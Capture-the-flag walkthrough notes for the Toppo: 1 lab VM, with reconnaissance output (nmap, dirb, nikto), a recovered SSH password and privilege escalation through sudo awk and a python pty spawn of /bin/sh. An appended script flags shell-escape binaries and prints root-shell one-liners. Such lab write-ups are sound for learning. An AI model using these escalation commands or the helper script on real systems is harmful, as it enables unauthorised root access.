
VM 26. Toppo: 1

root@kali:~/reports/192.168.117.3# cat 192.168.117.3.nmap
# Nmap 7.70 scan initiated Mon Jul 16 13:37:02 2018 as: nmap -sV -O -oN ../reports/192.168.117.3/192.168.117.3.nmap 192.168.117.3
Nmap scan report for 192.168.117.3
Host is up (0.00048s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
80/tcp  open  http    Apache httpd 2.4.10 ((Debian))
111/tcp open  rpcbind 2-4 (RPC #100000)
49473/tcp open  unknown
MAC Address: 08:00:27:1E:4A:01 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jul 16 13:37:10 2018 -- 1 IP address (1 host up) scanned in 8.66 seconds

0000000000000000000

cat udp_192.168.117.3.nmap
# Nmap 7.70 scan initiated Mon Jul 16 13:37:11 2018 as: nmap -Pn -A -sC -sU -T 3 --top-ports 200 -oN ../reports/192.168.117.3/udp_192.168.117.3.nmap 192.168.117.3
Nmap scan report for 192.168.117.3
Host is up (0.00036s latency).
Not shown: 198 closed ports
PORT    STATE         SERVICE VERSION
68/udp  open|filtered dhcpc
111/udp open          rpcbind 2-4 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100024  1          44313/udp  status
|_  100024  1          49473/tcp  status
MAC Address: 08:00:27:1E:4A:01 (Oracle VirtualBox virtual NIC)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.36 ms 192.168.117.3

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jul 16 13:42:23 2018 -- 1 IP address (1 host up) scanned in 313.19 seconds

root@kali:~/reports/192.168.117.3# cat unicorn_udp_192.168.117.3.txt
UDP open 192.168.117.3:111  ttl 64
UDP open                  sunrpc[  111]         from 192.168.117.3  ttl 64

0000000000000000000

root@kali:~/reports/192.168.117.3# cat dirb.txt
+ http://192.168.117.3/index.html (CODE:200|SIZE:6437)
+ http://192.168.117.3/LICENSE (CODE:200|SIZE:1093)
+ http://192.168.117.3/manual/index.html (CODE:200|SIZE:626)
+ http://192.168.117.3/manual/da/index.html (CODE:200|SIZE:9041)
+ http://192.168.117.3/manual/de/index.html (CODE:200|SIZE:9290)
+ http://192.168.117.3/manual/en/index.html (CODE:200|SIZE:9206)
+ http://192.168.117.3/manual/es/index.html (CODE:200|SIZE:9255)
+ http://192.168.117.3/manual/fr/index.html (CODE:200|SIZE:9479)
+ http://192.168.117.3/manual/ja/index.html (CODE:200|SIZE:9649)
+ http://192.168.117.3/manual/ko/index.html (CODE:200|SIZE:8513)
+ http://192.168.117.3/manual/tr/index.html (CODE:200|SIZE:9416)
+ http://192.168.117.3/manual/zh-cn/index.html (CODE:200|SIZE:8884)
+ http://192.168.117.3/manual/da/developer/index.html (CODE:200|SIZE:5892)
+ http://192.168.117.3/manual/da/faq/index.html (CODE:200|SIZE:3602)
+ http://192.168.117.3/manual/da/howto/index.html (CODE:200|SIZE:6962)
+ http://192.168.117.3/manual/da/misc/index.html (CODE:200|SIZE:5106)
+ http://192.168.117.3/manual/da/mod/index.html (CODE:200|SIZE:22377)
+ http://192.168.117.3/manual/da/programs/index.html (CODE:200|SIZE:6897)
+ http://192.168.117.3/manual/da/ssl/index.html (CODE:200|SIZE:5049)
+ http://192.168.117.3/manual/de/developer/index.html (CODE:200|SIZE:5892)
+ http://192.168.117.3/manual/de/faq/index.html (CODE:200|SIZE:3602)
+ http://192.168.117.3/manual/de/howto/index.html (CODE:200|SIZE:6962)
+ http://192.168.117.3/manual/de/misc/index.html (CODE:200|SIZE:5106)
+ http://192.168.117.3/manual/de/mod/index.html (CODE:200|SIZE:22569)
+ http://192.168.117.3/manual/de/programs/index.html (CODE:200|SIZE:6897)
+ http://192.168.117.3/manual/de/ssl/index.html (CODE:200|SIZE:5049)
+ http://192.168.117.3/manual/en/developer/index.html (CODE:200|SIZE:5892)
+ http://192.168.117.3/manual/en/faq/index.html (CODE:200|SIZE:3602)
+ http://192.168.117.3/manual/en/howto/index.html (CODE:200|SIZE:6962)
+ http://192.168.117.3/manual/en/misc/index.html (CODE:200|SIZE:5106)
+ http://192.168.117.3/manual/en/mod/index.html (CODE:200|SIZE:22377)
+ http://192.168.117.3/manual/en/programs/index.html (CODE:200|SIZE:6897)
+ http://192.168.117.3/manual/en/ssl/index.html (CODE:200|SIZE:5049)
+ http://192.168.117.3/manual/es/developer/index.html (CODE:200|SIZE:5892)
+ http://192.168.117.3/manual/es/faq/index.html (CODE:200|SIZE:3602)
+ http://192.168.117.3/manual/es/howto/index.html (CODE:200|SIZE:6962)
+ http://192.168.117.3/manual/es/misc/index.html (CODE:200|SIZE:5106)
+ http://192.168.117.3/manual/es/mod/index.html (CODE:200|SIZE:22752)
+ http://192.168.117.3/manual/es/programs/index.html (CODE:200|SIZE:6298)
+ http://192.168.117.3/manual/es/ssl/index.html (CODE:200|SIZE:5049)
+ http://192.168.117.3/manual/fr/developer/index.html (CODE:200|SIZE:5892)
+ http://192.168.117.3/manual/fr/faq/index.html (CODE:200|SIZE:3604)
+ http://192.168.117.3/manual/fr/howto/index.html (CODE:200|SIZE:7136)
+ http://192.168.117.3/manual/fr/misc/index.html (CODE:200|SIZE:5407)
+ http://192.168.117.3/manual/fr/mod/index.html (CODE:200|SIZE:24329)
+ http://192.168.117.3/manual/fr/programs/index.html (CODE:200|SIZE:7185)
+ http://192.168.117.3/manual/fr/ssl/index.html (CODE:200|SIZE:5191)
+ http://192.168.117.3/manual/ja/developer/index.html (CODE:200|SIZE:5892)
+ http://192.168.117.3/manual/ja/faq/index.html (CODE:200|SIZE:3602)
+ http://192.168.117.3/manual/ja/howto/index.html (CODE:200|SIZE:7723)
+ http://192.168.117.3/manual/ja/misc/index.html (CODE:200|SIZE:5106)
+ http://192.168.117.3/manual/ja/mod/index.html (CODE:200|SIZE:23684)
+ http://192.168.117.3/manual/ja/programs/index.html (CODE:200|SIZE:6897)
+ http://192.168.117.3/manual/ja/ssl/index.html (CODE:200|SIZE:5274)
+ http://192.168.117.3/manual/ko/developer/index.html (CODE:200|SIZE:5892)
+ http://192.168.117.3/manual/ko/faq/index.html (CODE:200|SIZE:3602)
+ http://192.168.117.3/manual/ko/howto/index.html (CODE:200|SIZE:6373)
+ http://192.168.117.3/manual/ko/misc/index.html (CODE:200|SIZE:5197)
+ http://192.168.117.3/manual/ko/mod/index.html (CODE:200|SIZE:21813)
+ http://192.168.117.3/manual/ko/programs/index.html (CODE:200|SIZE:5773)
+ http://192.168.117.3/manual/ko/ssl/index.html (CODE:200|SIZE:5049)
+ http://192.168.117.3/manual/tr/developer/index.html (CODE:200|SIZE:5892)
+ http://192.168.117.3/manual/tr/faq/index.html (CODE:200|SIZE:3612)
+ http://192.168.117.3/manual/tr/howto/index.html (CODE:200|SIZE:6962)
+ http://192.168.117.3/manual/tr/misc/index.html (CODE:200|SIZE:5339)
+ http://192.168.117.3/manual/tr/mod/index.html (CODE:200|SIZE:22660)
+ http://192.168.117.3/manual/tr/programs/index.html (CODE:200|SIZE:7405)
+ http://192.168.117.3/manual/tr/ssl/index.html (CODE:200|SIZE:5196)
+ http://192.168.117.3/manual/zh-cn/developer/index.html (CODE:200|SIZE:5995)
+ http://192.168.117.3/manual/zh-cn/faq/index.html (CODE:200|SIZE:3571)
+ http://192.168.117.3/manual/zh-cn/howto/index.html (CODE:200|SIZE:6566)
+ http://192.168.117.3/manual/zh-cn/misc/index.html (CODE:200|SIZE:4807)
+ http://192.168.117.3/manual/zh-cn/mod/index.html (CODE:200|SIZE:22261)
+ http://192.168.117.3/manual/zh-cn/programs/index.html (CODE:200|SIZE:6833)
+ http://192.168.117.3/manual/zh-cn/ssl/index.html (CODE:200|SIZE:5042)

0000000000000000000

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.117.3
+ Target Hostname:    192.168.117.3
+ Target Port:        80
+ Start Time:         2018-07-16 14:09:45 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.10 (Debian)
+ Server leaks inodes via ETags, header found with file /, fields: 0x1925 0x563f5cf714e80
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.10 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ OSVDB-3268: /admin/: Directory indexing found.
+ OSVDB-3092: /admin/: This might be interesting...
+ OSVDB-3268: /img/: Directory indexing found.
+ OSVDB-3092: /img/: This might be interesting...
+ OSVDB-3268: /mail/: Directory indexing found.
+ OSVDB-3092: /mail/: This might be interesting...
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7535 requests: 0 error(s) and 15 item(s) reported on remote host
+ End Time:           2018-07-16 14:10:02 (GMT-5) (17 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

0000000000000000000
ssh login: ted
password: 12345ted123 (found on one of the site's pages; nikto shows directory indexing on /admin/, /img/ and /mail/, so the listable directories are the first place to look)
kernel: 3.16.0-4-586 (Debian 3.16.51-3)

Approach 1: ran a privilege check; ted has sudo access to awk, so an awk program whose BEGIN block calls system() hands that privilege to a shell:

$ awk 'BEGIN {system("/bin/sh")}'

Run it through sudo when the right comes from sudoers. awk only passes on the privilege it was started with, so the resulting /bin/sh is root only if awk itself ran as root.
0000000000000000000
Approach 2: spawn a proper TTY with python to get a root prompt:

python -c 'import pty; pty.spawn("/bin/sh")'

Caveat: pty.spawn by itself only upgrades the shell to a real terminal (job control, no "must be run from a terminal" errors from su/sudo). The prompt comes back as root only when the python binary runs with root privileges, i.e. it is SUID root or invoked via sudo, and the spawned shell does not drop the effective uid.
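The "priv check" step above is the one worth making repeatable. The script below is an added example and not part of the original notes: it takes the output of `sudo -l` or of `find / -perm -4000 -type f 2>/dev/null`, flags the binaries known to hand their privilege to a child shell (awk and python on this box), and prints the one-liner to try. The function names (`flag_shell_escapes`, `escape_hint`, `run_check`), the `ESCAPE_BINS` list and both sample inputs are assumptions constructed for the example, not captured from the machine.

```shell
#!/bin/sh
# Added example for the notes above; not code from the original walkthrough.
# Feed it "sudo -l" output or a list of SUID paths and it prints the binaries
# that can pass their privilege on to a shell, plus the command to try.

# Interpreters and editors that can run system("/bin/sh") or equivalent.
# This list is an assumption chosen for the example, not an exhaustive catalogue.
ESCAPE_BINS="awk mawk gawk nawk python python2 python2.7 python3 perl ruby vi vim nano less more find bash sh"

# Reads lines on stdin, pulls out every /absolute/path token, and prints
# "basename<TAB>path" for each whose basename is in ESCAPE_BINS.
flag_shell_escapes() {
    grep -o '/[^[:space:],:]*' | sort -u | while IFS= read -r path; do
        name=$(basename "$path")
        for b in $ESCAPE_BINS; do
            if [ "$b" = "$name" ]; then
                printf '%s\t%s\n' "$name" "$path"
                break
            fi
        done
    done
}

# Prints the shell-escape one-liner for a flagged binary. $1 is the basename,
# $2 the path. Prefix with sudo yourself when the right comes from sudoers;
# for a SUID binary the spawned shell must not drop the effective uid.
escape_hint() {
    case "$1" in
        awk|mawk|gawk|nawk) printf '%s %s\n' "$2" "'BEGIN {system(\"/bin/sh\")}'" ;;
        python*)            printf '%s -c %s\n' "$2" "'import pty; pty.spawn(\"/bin/sh\")'" ;;
        perl)               printf '%s -e %s\n' "$2" "'exec \"/bin/sh\";'" ;;
        *)                  printf 'no canned hint for %s (%s)\n' "$1" "$2" ;;
    esac
}

# Constructed sample inputs (not captured from the box), shaped like the real
# command output so the functions can be exercised offline.
SAMPLE_SUDO='Matching Defaults entries for ted on this host:
    env_reset, mail_badpass

User ted may run the following commands on this host:
    (ALL) NOPASSWD: /usr/bin/awk'

SAMPLE_SUID='/usr/bin/python2.7
/usr/bin/mawk
/bin/ping
/usr/bin/passwd
/bin/su'

# Lists candidates from both sources and shows the hint for each.
run_check() {
    printf '%s\n' "$SAMPLE_SUDO" "$SAMPLE_SUID" | flag_shell_escapes | while read -r name path; do
        printf '[%s] %s\n' "$path" "$(escape_hint "$name" "$path")"
    done
}

run_check
```

On a real target replace the two sample variables with `sudo -l 2>/dev/null` and `find / -perm -4000 -type f 2>/dev/null`; the script only reports candidates, the decision to run a hint (and whether it needs `sudo` in front) stays with you.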
